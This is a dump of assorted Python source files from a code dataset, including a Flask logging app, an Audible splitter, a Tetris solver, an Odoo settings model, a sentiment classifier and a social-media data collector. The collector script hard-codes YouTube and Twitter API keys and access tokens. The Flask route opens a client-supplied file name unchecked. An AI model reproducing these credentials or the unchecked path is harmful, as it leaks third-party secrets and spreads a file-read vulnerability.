sn of counter != kvargs[\"sn\"], this request not add to result.\n\tif kvargs['sn']:\n\t\trequests = filter(lambda request: \n\t\t\trequest.get(\"request_body\").get(\"sn\") == kvargs['sn'], requests)\n\n\t# Add a filter if measurment date \"readout_dt\" < kvargs['start_date'], \n\t# this measurment not add to result.\n\tif kvargs['start_date']:\n\t\tfor request in requests:\n\t\t\trequest.get(\"request_body\")[\"data\"] = filter(\n\t\t\t\tlambda item: item[\"readout_dt\"] >= datetime.date(kvargs['start_date']), \n\t\t\t\trequest.get(\"request_body\")[\"data\"])\n\n\t\trequests = filter(lambda request: \n\t\t\tlen(request.get(\"request_body\").get(\"data\")) >= 1, requests)\n\n\t# Sorting result list by date (early -> late).\n\trequests.sort(key = lambda i: i[\"datetime\"], reverse = True)\t\n\treturn requests\n\n@app.route('/')\ndef index():\n\t\"\"\"Render index page\"\"\"\n\treturn render_template('index.html')\n\n@app.route('/datareceiver', methods=['GET','POST'])\ndef datareceiver():\n\t\"\"\"Get data in JSON format from client and add information\n\tabout requset in request.log. Return status: OK if success.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\tlogger = logging.getLogger('app.views')\n\tlogger.setLevel(logging.INFO)\n\n\tlogger.addHandler(request_file_hendler)\n\tdata = request.get_json()\n\tlogger.info('{}\\n{}'.format(request.remote_addr, \n\t\t\t\t\t\t\t\tjson.dumps(data, encoding=\"ascii\"))) \n\treturn jsonify({'status' : 'OK'}), 200\n\n@app.route('/getlog', methods=['GET','POST'])\ndef getlog():\n\t\"\"\"Return to client render_template of error_log or request_log\n\t1. Get from client what type of log he want's to see (errors or requests).\n\t2. Get list of dictionaries from get_list_of_errors or get_list_of_requset\n\twith emty named arguments.\n\t3. Return to a client html page with content of errors or requests log.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tfilename = get_file_name(request.get_json())\n\twith open(os.path.join(base_dir, filename)) as fd:\n\t\tfull_log = fd.read()\n\n\tif not full_log:\n\t\treturn jsonify({'log':'
[FILE_IN [\\\"ffmpeg options\\\" [OUTPUT_EXT]]]\")\n print()\n print(\"Examples:\")\n print(sys.argv[0] + \" B00TKSFFJE\")\n print(sys.argv[0] + \" \\\"https://stories.audible.com/audibleapi/1.0/content/B00TKSFFJE/metadata?drm_type=Hls&response_groups=chapter_info\\\"\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4 \\\"-b:a 64k -c:a mp3\\\" mp3\")\n exit()\n\nchapters_url = sys.argv[1]\n\nfile_in = \"file_in.mp4\"\nif len(sys.argv) > 2:\n file_in = sys.argv[2]\nfile_ext = file_in.split('.')[-1]\n\nffmpeg_option = \"-c copy\"\nif len(sys.argv) > 3:\n ffmpeg_option = sys.argv[3]\nif len(sys.argv) > 4:\n file_ext = sys.argv[4]\n\nif re.fullmatch(r\"[\\w]+\", chapters_url):\n chapters_url = f\"https://stories.audible.com/audibleapi/1.0/content/{chapters_url}/metadata?drm_type=Hls&response_groups=chapter_info\"\n\nresp = requests.get(chapters_url)\ncontent = resp.json()\nchapters = content['content_metadata']['chapter_info']['chapters']\n\n\n\n\nfor i, chapter in enumerate(chapters):\n start_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['start_offset_ms'] / 1000))) + '.' + f\"{(chapter['start_offset_ms'] % 1000):03d}\"\n length_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['length_ms'] / 1000))) + '.' + f\"{(chapter['length_ms'] % 1000):03d}\"\n filename = f\"{i:03d} {chapter['title']}.{file_ext}\"\n filename = re.sub(r\"[^\\w\\-_\\. ']\", '_', filename)\n print(f\"ffmpeg -i \\\"{file_in}\\\" -ss {start_ms} -t {length_ms} {ffmpeg_option} \\\"{filename}\\\" && ^\")\n\nprint(\"echo Done!\")","sub_path":"split_audible.py","file_name":"split_audible.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"231397684","text":"\nimport numpy as np\nimport time\n \nclass Board():\n def __init__(self, bits, depth = 0, max_depth = 3, board_size = (20, 10)):\n self.bits = bits\n if depth == 0: \n self.score = 0\n else: \n self.score = self.calculateScore()\n self.depth = depth \n self.children = []\n self.max_depth = max_depth\n self.board_size = board_size\n \n def generateBoard(self, shape):\n children = []\n if self.depth < self.max_depth: \n if shape == \"I\": \n #vertical \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0] \n for num, i in enumerate(highests * (highests > 3)): \n if i > 0:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[range(i-4,i), num] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n # horizontal \n for i in range(self.board_size[1] - 3):\n if np.all(highests[range(i,i+4)] > 0):\n num = min(highests[range(i,i+4)]) - 1\n if np.all(highests[range(i,i+4)] == highests[i]):\n mask = np.zeros(self.board_size, dtype=bool)\n mask[num, range(i,i+4)] = True \n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n if shape == \"O\": \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0]\n doesNotTouchCeiling = (highests * (highests > 1))\n for num, (i, j) in enumerate(zip(doesNotTouchCeiling[:-1], doesNotTouchCeiling[1:])):\n if i > 0 and j > 0: \n ind = min(highests[range(num, num + 2)]) - 1\n if highests[num] == highests[num+1]:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[ind-1, num] = True\n mask[ind, num] = True\n mask[ind-1, num+1] = True\n mask[ind, num+1] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b) \n return(children) \n def __str__(self):\n outstr = \"\"\n for x in self.bits:\n for y in x:\n if y:\n outstr += \"o \"\n else: \n outstr += \". \"\n outstr += \"\\n\"\n return outstr \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n \n def printTerminalNodes(self):\n for x in self.children:\n x.printTerminalNodes()\n if not x.children:\n print(x)\n \n def calculateScore(self):\n return(np.min(np.where(self.bits)[0]), getLongestLowest(self.bits))\n \n\nn = 100\nboard_size = (20, 10)\na = Board(np.zeros(board_size, dtype=bool), 0, 5, board_size)\nchildren = []\nchildren.extend(a.generateBoard(\"O\")[:n])\nchildren.extend(a.generateBoard(\"I\")[:n])\na.children = children\na.children.sort(key=lambda s: s.score, reverse=True)\nfor x in a.children: \n children = []\n children.extend(x.generateBoard(\"O\")[:n])\n children.extend(x.generateBoard(\"I\")[:n])\n x.children = children\n x.children.sort(key=lambda s: s.score, reverse=True)\n for y in x.children:\n children = []\n children.extend(y.generateBoard(\"O\")[:n])\n children.extend(y.generateBoard(\"I\")[:n])\n y.children = children\n y.children.sort(key=lambda s: s.score, reverse=True)\n for z in y.children:\n children = []\n children.extend(z.generateBoard(\"O\")[:n])\n children.extend(z.generateBoard(\"I\")[:n])\n z.children = children\n z.children.sort(key=lambda s: s.score, reverse=True)\n \na.countChildren()\n\n\nprint(z)\n\ndef getLongestLowest(bits):\n horizontal_length = bits.shape[1]\n lowest = np.max(np.where(bits)[0])\n tot = np.sum(np.all(bits,1)) * horizontal_length\n for n1 in range(horizontal_length): \n if not bits[lowest][n1]:\n c = 1 \n for n2 in range(n1+1, horizontal_length):\n c += 1\n if bits[lowest][n2]:\n break\n tot = max(c, tot) \n return(tot) \n","sub_path":"Tetris/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192546291","text":"from nider.core import Font\nfrom nider.core import Outline\nfrom nider.models import Content\nfrom nider.models import Linkback\nfrom nider.models import Paragraph\nfrom nider.models import Image\nimport json\n\nf = open(\"quotes.json\", \"r\")\nFile_json = json.load(f, encoding='ISO 8859-1')\nroboto_font_folder = '/home/ziad/Desktop/Console_Posts/Posts/'\ntext_outline = Outline(2, '#121212')\n\ndef img_to_txt(txt,author,result):\n para = Paragraph(text=txt,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n text_width=30,\n align='center',\n color='#ededed',\n outline=text_outline\n )\n linkback = Linkback(text=author,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n color='#ededed',\n outline=text_outline\n )\n content = Content(paragraph=para, linkback=linkback)\n img = Image(content,\n fullpath=result,\n width=3000,\n height=2005\n )\n img.draw_on_image('bg.png')\ndef quote_Text(counter):\n global File_json\n quoteText = File_json[counter]['quoteText']\n return quoteText\ndef quote_Author(counter):\n global File_json\n quoteAuthor = \"-\" + File_json[counter]['quoteAuthor'] \n return quoteAuthor\nfor counter in range(550):\n result = str(counter) + \".png\"\n img_to_txt(quote_Text(counter),quote_Author(counter),result)\n","sub_path":"img_return.py","file_name":"img_return.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72745364","text":"from .base import FunctionalTest\nfrom .list_page import ListPage\nfrom .my_lists_page import MyListsPage\n\ndef quit_if_possible(browser):\n #try: browser.quit()\n #except: pass\n browser.quit()\n\nclass SharingTest(FunctionalTest):\n def test_can_share_a_list_with_another_user_pt1(self):\n list_page = ListPage(self)\n \n # Edith is a logged-in user\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the home page and starts a list\n self.browser.get(self.live_server_url)\n \n list_page.add_list_item('Get help')\n \n # She notices a \"Share this list\" option\n share_box = list_page.get_share_box()\n \n # and notices that the placeholder \"your-friend@example.com\" is present\n self.assertEqual(\n share_box.get_attribute('placeholder'),\n 'your-friend@example.com'\n )\n \n # She shares her list by entering the email address of a friend\n # The page updates to say that it's shared with Oniciferous:\n list_page.share_list_with('oniciferous@example.com')\n\n\n ## note - in order for this to work, all 3 parts need to be made part of the same test. Because otherwise, the temporary database used is destroyed between tests, creating a false error\n #def test_can_share_a_list_with_another_user_pt2(self):\n # list_page = ListPage(self)\n\n # Ediths friend Oniciferous is also hanging out on the lists site as a logged in user\n self.create_pre_authenticated_session('oniciferous@example.com')\n\n # Oniciferous goes to the lists page with his browser\n MyListsPage(self).go_to_my_lists_page()\n\n # He sees Edith's list in there!\n self.browser.find_element_by_link_text('Get help').click()\n\n # On the list page, Oniciferous can see says that it's Edith's list\n self.wait_for(lambda: self.assertIn(\n 'edith@example.com',\n list_page.get_list_owner()\n ))\n\n # He adds an item to the list\n list_page.add_list_item('Hi Edith!')\n\n #def test_can_share_a_list_with_another_user_pt3(self):\n # list_page = ListPage(self)\n\n # When Edith refreshes the page, she sees Oniciferous's addition\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the lists page in her browser\n MyListsPage(self).go_to_my_lists_page()\n\n # She clicks on the list that she created earlier\n self.browser.find_element_by_link_text('Get help').click()\n\n # And finds that Oniciferous has added something to her list\n list_page.wait_for_row_in_list_table('Hi Edith!', 2)\n \n \n ","sub_path":"functional_tests/test_sharing.py","file_name":"test_sharing.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"2636082","text":"# -*- coding: utf-8 -*-\n###################################################################################\n#\n# Copyright (C) 2020 Odox SoftHub LLP()\n# Author: Albin Mathew()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n###################################################################################\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n commission_account_id = fields.Many2one(comodel_name='account.account', string=\"Commission Account\")\n discount_account_id = fields.Many2one(comodel_name='account.account', string=\"Discount Account\")\n bank_fee_account_id = fields.Many2one(comodel_name='account.account', string=\"Bank Fee Account\")\n currency_diff_account_id = fields.Many2one(comodel_name='account.account', string=\"Currency Diff Account\")\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo()\n res.update(\n commission_account_id=int(params.get_param('odx_sale_purchase_customization.commission_account_id')),\n\n )\n res.update(\n discount_account_id=int(params.get_param('odx_sale_purchase_customization.discount_account_id')),\n\n )\n res.update(\n bank_fee_account_id=int(params.get_param('odx_sale_purchase_customization.bank_fee_account_id')),\n\n )\n res.update(\n currency_diff_account_id=int(params.get_param('odx_sale_purchase_customization.currency_diff_account_id')),\n\n )\n\n return res\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.commission_account_id\",\n self.commission_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.discount_account_id\",\n self.discount_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.bank_fee_account_id\",\n self.bank_fee_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.currency_diff_account_id\",\n self.currency_diff_account_id.id)\n\n\n\n","sub_path":"odx_sale_purchase_customization/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"345334325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 30 18:51:15 2018\n\n@author: brihat\n\"\"\"\n\n#import nltk\n#nltk.download('stopwords')\n#nltk.download('punkt')\nfrom nltk.corpus import stopwords\n\nfrom sklearn.model_selection import train_test_split\n#from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import numpy as np\n\nclass MovieReviews:\n \n def readText(filename):\n DF = pd.read_csv(filename, sep = \"\\n\", header = None)\n DF.columns = ['Reviews']\n return DF\n \n \n def splitDataframe(pandasDataFrame):\n train, test = train_test_split(pandasDataFrame, test_size = 0.15)\n return train, test\n \n def mergeDataFrame(pandasDataFrame1, pandasDataFrame2, pos, neg):\n DF1 = pandasDataFrame1.assign(label = pos)\n DF2 = pandasDataFrame2.assign(label = neg)\n df_new = pd.concat([DF1, DF2])\n return df_new\n \n def usePipeline(pandasDataFrame):\n stop = set(stopwords.words('english'))\n text_clf = Pipeline([('vect', TfidfVectorizer(ngram_range = (1, 2), min_df = 2, stop_words = stop)),\n ('clf', SGDClassifier()),])\n\n return text_clf\n \n \n def fitTrainData(text_clf, pandasDataFrame):\n text_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n return text_clf\n \n def predictionWithAccuracy(text_clf, pandasDataFrame):\n predicted = text_clf.predict(pandasDataFrame.Reviews)\n #accuracy = np.mean(predicted == pandasDataFrame.label)\n return predicted\n \n def getMetrics(gs_clf, pandasDataFrame):\n target_names = ['PR', 'NR']\n predictionList = gs_clf.predict(pandasDataFrame.Reviews)\n result = metrics.classification_report(pandasDataFrame.label, predictionList, target_names = target_names)\n return result, predictionList\n \n def getConfusionMatrix(pandasDataFrame, predictionList):\n conf_matrix = metrics.confusion_matrix(pandasDataFrame.label, predictionList)\n return conf_matrix\n \n def useGridSearch(text_clf, pandasDataFrame):\n C = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]\n param_grid = [{'clf__alpha': C, 'clf__loss': ['hinge', 'squared_hinge', 'log'], 'clf__max_iter': [100]}]\n gs_clf = GridSearchCV(text_clf, param_grid = param_grid, cv = 10, n_jobs = -1)\n gs_clf = gs_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n best_score = gs_clf.best_score_\n best_param = gs_clf.best_params_\n return gs_clf, best_score, best_param\n \n def getROCCurve(gs_clf, pandasDataFrame):\n score_roc = gs_clf.decision_function(pandasDataFrame.Reviews)\n fpr, tpr, thresholds = metrics.roc_curve(pandasDataFrame.label, score_roc)\n roc_auc = metrics.auc(fpr, tpr)\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.plot([0,1], [0, 1], 'r--')\n plt.show()\n \nif __name__ == '__main__':\n RD = MovieReviews\n posReviewDF = RD.readText(\"rt-polarity.pos\")\n negReviewDF = RD.readText(\"rt-polarity.neg\")\n #print (negReviewDF) \n #posReviewDF1 = RD.removeStopwords(posReviewDF)\n #negReviewDF1 = RD.removeStopwords(negReviewDF)\n #print(posReviewDF1)\n posReviewDFTrain, posReviewDFTest = RD.splitDataframe(posReviewDF)\n negReviewDFTrain, negReviewDFTest = RD.splitDataframe(negReviewDF)\n #print(negReviewDFTrain) \n reviewTrainDF = RD.mergeDataFrame(posReviewDFTrain, negReviewDFTrain, 1, 0)\n reviewTestDF = RD.mergeDataFrame(posReviewDFTest, negReviewDFTest, 1, 0)\n print(negReviewDFTest)\n print(posReviewDFTest)\n print(posReviewDFTest.shape, negReviewDFTest.shape)\n print(reviewTestDF.shape)\n text_clf = RD.usePipeline(reviewTrainDF) \n gs_clf, best_score, best_param = RD.useGridSearch(text_clf, reviewTrainDF)\n print(\"best_score: \")\n print(best_score)\n print(\"Best Parameter: \")\n print(best_param)\n MetricsF1Scores, predictionList = RD.getMetrics(gs_clf, reviewTestDF)\n print(\"Metrics: \")\n print(MetricsF1Scores)\n conf_matrix = RD.getConfusionMatrix(reviewTestDF, predictionList)\n print(\"Confusion Matrix :\")\n print(conf_matrix)\n \n RD.getROCCurve(gs_clf, reviewTestDF)\n \n ","sub_path":"src/MovieReviewSGDclassifier.py","file_name":"MovieReviewSGDclassifier.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"607823293","text":"import unittest\nfrom torch.autograd import gradcheck\nfrom quantize import *\n\nclass TestQuantize(unittest.TestCase):\n def test_softmin_back(self):\n x = (torch.rand(20, 10, dtype=torch.double, requires_grad=True),)\n self.assertTrue(gradcheck(softmin, x))\n\n def test_quantize(self):\n x = 2*torch.rand((100, 100), dtype=torch.double) - 1\n centers = 2*torch.arange(200, dtype=torch.double)*1/200 - 1\n qx = quantize(x, centers, 0.1)\n ax = (x * 100).round() / 100\n print(x)\n print(qx)\n self.assertTrue(torch.mean(torch.abs(qx - ax)) < 1/400)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_quantize.py","file_name":"test_quantize.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"230091423","text":"\"\"\"\nnaming conventions\nclass names = camelCase\nnormal variables and functions = names_with_underscore\nglobal variables = CAPITAL\nglobal constant varibales = CAPITAL_CONST\n\"\"\"\n\nimport firebase_admin\nfrom firebase_admin import credentials\nimport connection\nimport threading\n\nFIREBASE_URL_CONST = \"\"\nPRIVATE_KEY_PATH = \"\"\n\ndef thread():\n t1 = threading.Thread(target=hardware.get_gps)\n t2 = threading.Thread(target=hardware.get_rfid)\n t3 = threading.Thread(target=hardware.get_camera)\n t1.start()\n t2.start()\n t3.start()\n\nif __name__ == \"__main__\":\n import sys\n\n cred = credentials.Certificate(PRIVATE_KEY_PATH)\n firebase_admin.initialize_app(cred, {\n 'databaseURL': FIREBASE_URL_CONST\n })\n\n hardware = connection.piHandler()\n thread()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"115523582","text":"# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE \r\n\r\nfrom urbansim.abstract_variables.abstract_number_of_agents_with_same_attribute_value import abstract_number_of_agents_with_same_attribute_value\r\n\r\nclass same_sector_employment_in_zone(abstract_number_of_agents_with_same_attribute_value):\r\n \"\"\"\"\"\"\r\n \r\n agent_attribute_name = \"job.sector_id\"\r\n agent_dependencies = ['urbansim_parcel.job.zone_id']\r\n choice_set_dependencies = ['urbansim_parcel.building.zone_id']\r\n #unique_agent_attribute_value = range(1, 20)\r\n geography_dataset_name = 'zone'\r\n ## use default\r\n #expression_agents_of_attribute_by_geography = \"'agents_of_attribute_%(agent_attribute_value)s = %(geography_dataset_name)s.aggregate(%(agent_attribute_name)s==%(agent_attribute_value)s)'\"\r\n \r\n \r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import arange, array\r\nfrom numpy import ma\r\nclass Tests(opus_unittest.OpusTestCase):\r\n \r\n def test_my_inputs(self):\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim_parcel', 'urbansim', 'opus_core'],\r\n test_data={\r\n \"job\":{ \r\n 'job_id': array([1, 2, 3, 4, 5, 6]),\r\n 'building_id':array([1, 1, 5, 3, 3, 3]),\r\n 'sector_id': array([1, 1, 2, 1, 3, 3]),\r\n }, \r\n \"building\":{ \r\n 'building_id': array([1, 2, 3, 4, 5,]),\r\n 'zone_id': array([1, 2, 2, 3, 4,]),\r\n },\r\n 'zone':{\r\n 'zone_id': array([1,2,3,4]),\r\n },\r\n })\r\n ## mind the mirror of gridcells in waling_distance calculus\r\n should_be = array([[2, 1, 1, 0, 0], \r\n [2, 1, 1, 0, 0],\r\n [0, 0, 0, 0, 1],\r\n [2, 1, 1, 0, 0],\r\n [0, 2, 2, 0, 0],\r\n [0, 2, 2, 0, 0]])\r\n \r\n tester.test_is_close_for_variable_defined_by_this_module(self, should_be)\r\n\r\n\r\nif __name__=='__main__':\r\n opus_unittest.main()\r\n","sub_path":"urbansim_parcel/job_x_building/same_sector_employment_in_zone.py","file_name":"same_sector_employment_in_zone.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43748699","text":"import json\nimport requests\nimport sys\nimport datetime\nimport time\nimport pandas\nimport tweepy\nfrom TwitterAPI import TwitterAPI\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nsys.stdout.flush()\n\n\ndef instagram_api(keyword):\n url1 = 'https://www.instagram.com/web/search/topsearch/?query='\n url2 = keyword\n url = url1 + url2\n\n response = requests.get(url)\n response_data = response.json()\n\n # GET FOLLOWER COUNT & HASHTAG COUNT\n follower_count = response_data['users'][0]['user']['follower_count']\n hashtag_count = 0\n for hashtag in response_data['hashtags']:\n hashtag_count += hashtag['hashtag']['media_count']\n\n return(follower_count, hashtag_count)\n\n\ndef youtube_id_mapping(input_list):\n out_list = []\n for i in input_list:\n q = i\n key = \"AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U\"\n url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=\" + q + \"&type=channel\" + \"&key=\" + key\n response = requests.get(url)\n response_data = response.json()\n out_list.append(response_data['items'][0]['id']['channelId'])\n\n return out_list\n\n\ndef youtube_api(user_id):\n key = 'AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U'\n url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&id=\" + user_id + \"&key=\" + key\n # User Name으로 접근하기\n #url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername=\"+name+\"&key=\"+key\n\n response = requests.get(url)\n response_data = response.json()\n\n out_data = response_data['items'][0]['statistics']\n return(int(out_data['viewCount']), int(out_data['commentCount']), int(out_data['subscriberCount']), int(out_data['videoCount']))\n\n\ndef twitter_api(keyword):\n # Consumner_key & Secret / Access_Token & Secret\n consumer_key = \"mq7ecRYTpx3OXcF6E5pCTGZTF\"\n consumer_secret = \"tRboVBFKrnxAXEjaNwwBRfWgZAqXowETSqKOtdSU4RNZUM9NSG\"\n\n access_token = \"991892597391081473-sXwXOYP253t85KWEBrqs3WPpOu7its4\"\n access_token_secret = \"pPiDRxsb5CZjdyZXZahzlFBl1xwfQ7hTTVxLJdKbA4xwd\"\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Get user's information -> follower count, favorite count, friends count, listed count\n user = api.search_users(keyword)\n user = user[0]\n return(user['followers_count'], user['favourites_count'], user['friends_count'], user['listed_count'])\n\n\n\n\n\n\n###############################################################\n# 자동으로 시간별 데이터 쌓기 (기간 단위 = 5분으로 Test)\n###############################################################\nprint('Start Test & nohup out test', flush=True)\n\n# SETTING\ntest_term = 60*5 # term = seconds (test: 5분씩 갱신 -> 1주일씩 갱신하려면 test_term = 60*60*24*7)\nres_list = [\"Nando’s\", \"KFC\", \"Subway\", \"Burger King\",\"Pizza Hut\", \"Domino’s\", \"Carl’s JR.\", \"Green Burrito\",\n \"McDonald’s\", \"Dunkin’ Donuts\", \"Tacobell\", \"Auntie Anne’s\", \"Cinnabon\",\"Charleys Philly Steak\",\n \"Quiznos\", \"Nathan’s Famous\", \"Red Robin\", \"Gourmet Burgers and Brew\",\"Shake shack\",\n \"Five Guys\", \"Chipotle\", \"In-N-Out\", \"Jack in the box\"] #release(1) company list\n\n\n# Res name -> HASHTAG 때문에 특수문자 제거 필요\ntem_res_list = []\nfor i in res_list:\n tem = i.replace(\"\\'\",\"\")\n tem = tem.replace(\"’\",\"\")\n tem = tem.replace(\".\",\"\")\n tem = tem.replace(\",\",\"\")\n tem = tem.replace(\"-\",\"\")\n tem_res_list.append(tem)\n\nres_list = tem_res_list\nyoutube_id_list = youtube_id_mapping(res_list) # 각 식당에 대한 유튜브 id 맵핑\n\n\n# WHILE LOOP\ntest_count = 0 # Test시에는 무한루프가 최대 100번 돌도록 설정\ntest_limit = 100\n\nwhile(True):\n date_list = []\n name_list = []\n instagram_follow_count_list = []\n instagram_hashtag_count_list = []\n youtube_view_count_list = []\n youtube_comment_count_list = []\n youtube_subscriber_count_list = []\n youtube_video_count_list = []\n twitter_follower_count_list = []\n twitter_favorite_count_list = []\n twitter_friends_count_list = []\n twitter_listed_count_list = []\n\n if test_count == test_limit:\n print(\"FINISH\", flush = True)\n break\n test_count += 1\n \n time.sleep(test_term)\n time_key = datetime.datetime.now()\n\n for i in range(len(res_list)):\n time.sleep(60) # Twitter api -> call 당 time.sleep(60) 필요함\n tem_list = []\n try:\n insta_follower, insta_hashtag = instagram_api(res_list[i])\n except:\n insta_follower, insta_hashtag = 0,0\n\n try:\n twit_follower, twit_favorites, twit_friends, twit_listed = twitter_api(res_list[i])\n except:\n twit_follower, twit_favorites, twit_friends, twit_listed = 0,0,0,0\n\n try:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video =youtube_api(youtube_id_list[i])\n except:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video = 0,0,0,0\n \n date_list.append(time_key)\n\n\n #BIG QUERY에 쌓을 때 레스토랑 네임 -> 소문자, 공백제거로 통일\n res_name = str(res_list[i]).lower()\n res_name = res_name.replace(\" \",\"\")\n name_list.append(res_name)\n\n instagram_follow_count_list.append(insta_follower)\n instagram_hashtag_count_list.append(insta_hashtag)\n youtube_view_count_list.append(youtub_view)\n youtube_comment_count_list.append(youtub_comment)\n youtube_subscriber_count_list.append(youtub_subscriber)\n youtube_video_count_list.append(youtub_video)\n twitter_follower_count_list.append(twit_follower)\n twitter_favorite_count_list.append(twit_favorites)\n twitter_friends_count_list.append(twit_friends)\n twitter_listed_count_list.append(twit_listed)\n\n df = pandas.DataFrame({'date' : date_list, 'name' : name_list, 'instagram_follow_count' : instagram_follow_count_list,\n 'instagram_hashtag_count' : instagram_hashtag_count_list, 'youtube_view_count' : youtube_view_count_list,\n 'youtube_comment_count' : youtube_comment_count_list, 'youtube_subscriber_count' : youtube_subscriber_count_list,\n 'youtube_video_count' : youtube_video_count_list, 'twitter_follower_count' : twitter_follower_count_list,\n 'twitter_favorite_count' : twitter_favorite_count_list, 'twitter_friend_count' : twitter_friends_count_list,\n 'twitter_listed_count' : twitter_listed_count_list})\n\n pandas.DataFrame.to_gbq(df, 'SNS_data.last_test', 'datamingo', if_exists = 'append', chunksize = 10000, verbose = True)\n print(datetime.datetime.now(), 'big query update!', flush=True)","sub_path":"SNS_api/data_to_bigquery_server.py","file_name":"data_to_bigquery_server.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
